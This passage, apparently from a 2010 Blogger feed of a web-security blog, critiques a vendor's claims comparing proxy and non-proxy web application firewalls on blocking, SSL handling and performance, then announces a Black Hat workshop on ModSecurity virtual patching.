For example, in many cases it would be best to respond to a violation with a custom message or connection reset, while in others the administrator may want to follow up with the main action directly, with a longer block time.</p><p>Only proxy-based solutions are able to offer this sort of flexibility, as non-proxy based WAFs rely solely on sending TCP resets back to the attacker and temporary network ACLs as their protective mechanisms. Attacking packets will make it through to the server, and blocking actions are time-limited.</p><p></p></blockquote><p style="font-family: arial;">Don't forget about the hybrid deployment option I mentioned at the beginning, which includes adding agents to specific web applications. This section does have a point, however, in that if you want to get more granular with handling custom error messages and redirecting the user under specific circumstances, then having an inline WAF provides more options. As far as disruptive actions, out-of-line WAFs are not relegated to only using TCP resets. One interesting reactive action that Breach Security's WebDefend appliance has is called "Application Logout", in which the WAF initiates an http request to the application that simulates the client actually logging out. This is similar in theory to doing TCP resets at lower OSI levels, where you have to spoof the proper sequence numbers in order to terminate the connections. For the http layer, WebDefend will dynamically insert the proper application SessionID cookie value when submitting the app logout, so from the application's perspective it appears that the logout was initiated by the user. Pretty slick. It is quite handy when used under certain policy violations such as suspected Session Hijacking events.<br /></p><p style="font-weight: bold; font-family: arial;">7. 
SSL architectural considerations</p><p style="font-family: arial;"></p><blockquote style="font-style: italic; font-family: arial;"><p>Application attacks use SSL cryptography and common encoding techniques to bypass traditional security measures, and hide their attacks. Proxy and non-proxy WAFs are quite different in the way they handle SSL cryptography and key management.</p><p>Non-proxy WAF vendors claim that they also have the technology to 'see' into an SSL encrypted packet as it passes by the non-proxy device. However, because decrypting and analysing the data takes time, by the time the non-proxy WAF is ready to make a decision, the attack will have already reached the back-end servers and completed the transaction.</p><p>Proxy based WAFs, on the other hand, are designed to serve as an SSL termination endpoint. Proxies tightly couple TCP, SSL and HTTP termination, giving them complete visibility into application content and allowing them to perform deep inspection on the entire session payload, including headers, URLs, parameters and form fields.</p></blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">This section brings up an interesting trade-off that all WAF users must deal with - performance/latency of inspection vs. effective blocking. Out-of-line deployments are ideal for the former, while inline deployments are the best for the latter. So, which item is more important to you? The second paragraph makes it seem as though out-of-line WAFs can't do the same SSL decryption/inspection, and that is false, as they can provide the same level of visibility. The issue is one of latency, and of whether disruptive actions can be applied after inspection.</p><p style="font-weight: bold; font-family: arial;">8. Accelerate and scale application delivery</p><p style="font-style: italic; font-family: arial;"></p><blockquote style="font-family: arial;">It is important that a WAF product does not negatively affect end-user response time. 
Proxy based firewalls fully terminate the TCP, SSL and HTTP, reducing end user response time. They should be able to cache static content from the application, offloading servers and saving download time; pool TCP connections to the back-end servers and offload SSL processing, thereby reducing server load and end-user response time. Non-proxy based WAF products do not offer these features.</blockquote><p style="font-family: arial;"></p><p style="font-family: arial;">The first sentence is the key from a WAF perspective as all users want to add in the security inspection without negatively affecting end users. If you deploy an out-of-line WAF, then there will be no added performance or latency hit. If, on the other hand, you deploy an inline WAF then there is going to be a negative impact due to the SSL decryption, traffic inspection and probable SSL re-encryption on the back-end. It is for this reason that many inline WAFs have had to add on the application acceleration aspects to attempt to off-set this performance hit. So, you end up having a WAF vendor that is then trying to bolt on ADC types of functions and compete with other vendors who specialize in this space (such as an F5). On the flip side, you have ADC vendors (again like an F5) who specialize in application delivery who try and also bolt on add-on modules to provide web application firewall functionality. The main problem I see on both fronts is that they are going outside of their core competency. When deploying a WAF, it is best to do an architecture review to identify the ideal location for both inspection and blocking of traffic. This may include placing WAFs either before or after existing HTTP Load Balancers. There are benefits of both approaches. From a blocking perspective, an out-of-line WAF has a better chance of terminating a TCP connection if it is deployed directly in front of another layer 7 inspection device. 
On the performance front - if you can terminate SSL decryption on the load balancers, then placing the WAF behind them will make it more performant.</p>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0tag:blogger.com,1999:blog-5361523904237597206.post-31793824462554459062010-03-09T11:10:00.004-05:002010-03-09T11:14:48.469-05:00WAF Virtual Patching Workshop at Blackhat USA 2010<span style="font-style: italic;">Submitted by Ryan Barnett 03/09/2010</span><br /><br /><span style="font-size:100%;"><span style="font-family:arial;">Just wanted to let everyone know that if you are headed to Blackhat USA 2010 this summer in Las Vegas, we have just added a 1-day workshop on the day before the Briefings start -</span><br /><span style="font-family:arial;"><br /><a href="http://www.blackhat.com/html/bh-us-10/training/bh-us-10-training_RB-WAFVirtPatch.html">http://www.blackhat.com/html/bh-us-10/training/bh-us-10-training_RB-WAFVirtPatch.html</a></span></span> <span style="font-size:100%;"><span style="font-family:arial;"><br /><br />In the workshop, we will be mainly discussing the "Virtual Patching" concept of using a WAF (ModSecurity in this case) and we will use the OWASP WebGoat app as the target. In the workshop, we will talk virtual patching theory and then have hands-on labs where we will show how to use Mod to virtually patch the various WebGoat lessons. As a side note - we will also have a section on the new CRS v2.0 when discussing negative security models. So, if you want to come and dive into the deep-end of the pool and have fun using some of ModSecurity's advanced features (such as Lua and Content Injection) then sign-up now!</span></span> <span style="font-size:100%;"><span style="font-family:arial;"><br /><br />Brian Rectanus and I hope to see you all in Vegas!!! :)</span></span>Ryan Barnetthttp://www.blogger.com/profile/12300602630139148313noreply@blogger.com0